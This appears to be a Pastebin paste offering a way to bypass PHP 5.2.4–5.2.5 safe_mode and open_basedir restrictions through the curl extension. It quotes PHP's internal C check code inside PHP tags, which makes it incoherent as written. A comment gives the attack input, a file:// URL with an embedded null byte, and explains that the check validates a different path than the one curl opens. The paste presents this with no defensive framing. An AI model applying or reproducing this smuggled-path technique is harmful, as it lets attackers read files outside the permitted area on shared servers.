Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- bypass SAFE MODE in PHP 5.2.4 - 5.2.5
- <?php
- #define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret);
- if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) && strncasecmp(str, "file:", sizeof("file:") - 1) == 0){
- php_url *tmp_url;
- if (!(tmp_url = php_url_parse_ex(str, len))) {
- php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str);
- php_curl_ret(__ret);
- }
- if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) {
- php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s' contains unencoded control characters", str);
- php_url_free(tmp_url);
- php_curl_ret(__ret);
- }
- if (tmp_url->query || tmp_url->fragment || php_check_open_basedir(tmp_url->path TSRMLS_CC) ||
- (PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+", CHECKUID_CHECK_MODE_PARAM))){
- php_url_free(tmp_url);
- php_curl_ret(__ret);
- }
- php_url_free(tmp_url);
- }
- /*
- if you have tmp_url = php_url_parse_ex(str, len) where:
- str = "file://safe_mode_bypass\x00".__FILE__
- and this function will return:
- tmp_url->path = __FILE__
- curl_init() functions checks safemode and openbasedir for tmp_url->path. Not for real path.
- */
- if (argc > 0) {
- char *urlcopy;
- urlcopy = estrndup(Z_STRVAL_PP(url), Z_STRLEN_PP(url));
- curl_easy_setopt(ch->cp, CURLOPT_URL, urlcopy);
- zend_llist_add_element(&ch->to_free.str, &urlcopy);
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
